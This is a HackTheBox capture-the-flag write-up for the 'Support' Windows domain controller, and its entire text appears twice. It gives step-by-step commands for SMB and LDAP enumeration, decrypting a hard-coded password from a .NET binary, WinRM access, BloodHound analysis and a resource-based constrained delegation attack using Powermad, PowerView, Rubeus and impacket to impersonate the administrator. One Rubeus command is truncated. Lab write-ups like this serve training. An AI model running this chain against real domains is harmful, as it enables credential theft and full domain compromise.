HacktheBox Support Write-up

Support.htb

Nmap Scan

nmap -sC -sV -Pn -oN support 10.10.11.174
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
(server time: 2022-08-08 02:59:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP 
(Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP 
(Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

 

Enumerate Port 53

dig any support.htb @10.10.11.174

Located dc.support.htb and hostmaster.support.htb

 

Enumerate Ports 135/593

python3 rpcclient.py -U "" -N 10.10.11.174

 

\pipe\atsvc – Task Scheduler, used to remotely execute commands

Protocol: N/A 
Provider: N/A 
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

 

\pip\lsass

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49664]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\DC[\pipe\lsass]

 

Enumerate Ports 139/445

MSFCONSOLE

msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 10.0.0.3
msf> run

smbclient -N -L //10.10.11.174

smbclient -N //10.10.11.174/support-tools

 

.Net Debug w/dnSpy

I opened Commando VM, connected to share and downloaded the UserInfo.exe.zip, extracted the .exe, and opened it in dnSpy

armando:0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
Encrypted Key  

To decrypt the key I chose to convert the encrypt code to python

Decrypt.py

import base64
enc_pass="0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key=b"armando"

array=base64.b64decode(enc_pass)
array2=[]

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print(''.join(array2))

 

Decrypted Key

armando:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

 

Enumerate LDAP with decrypted credentials

ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb"

 

Found Users and Credentials in NOTE

Users:Ironside47pleasure40Watchful support:Ironside47pleasure40Watchful ldap smith.rosario hernandez.stanley wilson.shelby anderson.damian thomas.raphael levine.leopoldo raven.clifton bardot.mary cromwell.gerard monroe.david west.laura langley.lucy daughtlet.mabel stoll.rachelle ford.victoria Administrator

 

Evil-winrm

evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

Bloodhound and Neo4j

##start neo4j
sudo start neo4j;

#start bloodhound
bloodhound;

#upload sharphound.exe through evil-winrm
upload SharpHound.exe

#run SharpHound.exe
.\SharpHound.exe

#download sharphound.zip
download /Temp/sharphound.zip ~/Documents/hackthebox/support/sharphound.zip

#DRAG and DROP FILES TO BLOODHOUND


Locate the user support@support.htb and check groups with “Group Membership -> First Degree Group Memberships”


Clicking on the 3 groups only “Shares Support Accounts@support.htb” has “Reachable High Value Targets” so I mark Shared Support Accounts as owned then click the “Analysis” tab and look for the “Shortest Path from Owned Principals -> support.htb -> Shared Support Accounts” which leads to the GenericAll for the domain controller DC.SUPPORT.HTB

Right clicking on GenericAll and selecting Help then searching the “Abuse Info” Tab gives instructions on exploitation. which is pasted down below

evil-winrm -s ~/Tools/privesc/windows/PowerSploit-3.0.0/Recon/ -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

In order to run the commands below I had to download Powermad.ps1 and a new PowerView.ps1 and stuff them into the Recon folder to use after I connected with evil-winrm

Pulled from Abuse Info in bloodhound

Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

 

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

 

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

 

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus’ s4u module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:



../Downloads/Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/atta

I used getST to grab the tgt in the .ccache format to use with smbexec.py

impacket-getST support.htb/attackersystem -dc-ip dc.support.htb -impersonate administrator -spn www/dc.support.htb
– PASSWORD:Summer2018!


Export ccache

export KRB5CCNAME=administrator.ccache


IMPACKET-SMBEXEC with -k flag set

impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k



At this point I’m able to type the flag

type C:\Users\Administrator\Desktop\root.txt
nmap -sC -sV -Pn -oN support 10.10.11.174
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
(server time: 2022-08-08 02:59:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP 
(Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP 
(Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

 

Enumerate Port 53

dig any support.htb @10.10.11.174

Located dc.support.htb and hostmaster.support.htb

 

Enumerate Ports 135/593

python3 rpcclient.py -U "" -N 10.10.11.174

 

\pipe\atsvc – Task Scheduler, used to remotely execute commands

Protocol: N/A 
Provider: N/A 
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49667]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[LRPC-2ff956068ca6c25e01]

 

\pip\lsass

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.11.174[49664]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\DC[\pipe\lsass]

 

Enumerate Ports 139/445

MSFCONSOLE

msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 10.0.0.3
msf> run

smbclient -N -L //10.10.11.174

smbclient -N //10.10.11.174/support-tools

 

.Net Debug w/dnSpy

I opened Commando VM, connected to share and downloaded the UserInfo.exe.zip, extracted the .exe, and opened it in dnSpy

armando:0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
Encrypted Key  

To decrypt the key I chose to convert the encrypt code to python

Decrypt.py

import base64
enc_pass="0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key=b"armando"

array=base64.b64decode(enc_pass)
array2=[]

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print(''.join(array2))

 

Decrypted Key

armando:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

 

Enumerate LDAP with decrypted credentials

ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb"

 

Found Users and Credentials in NOTE

Users:Ironside47pleasure40Watchful support:Ironside47pleasure40Watchful ldap smith.rosario hernandez.stanley wilson.shelby anderson.damian thomas.raphael levine.leopoldo raven.clifton bardot.mary cromwell.gerard monroe.david west.laura langley.lucy daughtlet.mabel stoll.rachelle ford.victoria Administrator

 

Evil-winrm

evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

Bloodhound and Neo4j

##start neo4j
sudo start neo4j;

#start bloodhound
bloodhound;

#upload sharphound.exe through evil-winrm
upload SharpHound.exe

#run SharpHound.exe
.\SharpHound.exe

#download sharphound.zip
download /Temp/sharphound.zip ~/Documents/hackthebox/support/sharphound.zip

#DRAG and DROP FILES TO BLOODHOUND


Locate the user support@support.htb and check groups with “Group Membership -> First Degree Group Memberships”


Clicking on the 3 groups only “Shares Support Accounts@support.htb” has “Reachable High Value Targets” so I mark Shared Support Accounts as owned then click the “Analysis” tab and look for the “Shortest Path from Owned Principals -> support.htb -> Shared Support Accounts” which leads to the GenericAll for the domain controller DC.SUPPORT.HTB

Right clicking on GenericAll and selecting Help then searching the “Abuse Info” Tab gives instructions on exploitation. which is pasted down below

evil-winrm -s ~/Tools/privesc/windows/PowerSploit-3.0.0/Recon/ -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

In order to run the commands below I had to download Powermad.ps1 and a new PowerView.ps1 and stuff them into the Recon folder to use after I connected with evil-winrm

Pulled from Abuse Info in bloodhound

Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

 

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

 

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

 

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus’ s4u module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:



../Downloads/Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/atta

I used getST to grab the tgt in the .ccache format to use with smbexec.py

impacket-getST support.htb/attackersystem -dc-ip dc.support.htb -impersonate administrator -spn www/dc.support.htb
– PASSWORD:Summer2018!


Export ccache

export KRB5CCNAME=administrator.ccache


IMPACKET-SMBEXEC with -k flag set

impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k



At this point I’m able to type the flag

type C:\Users\Administrator\Desktop\root.txt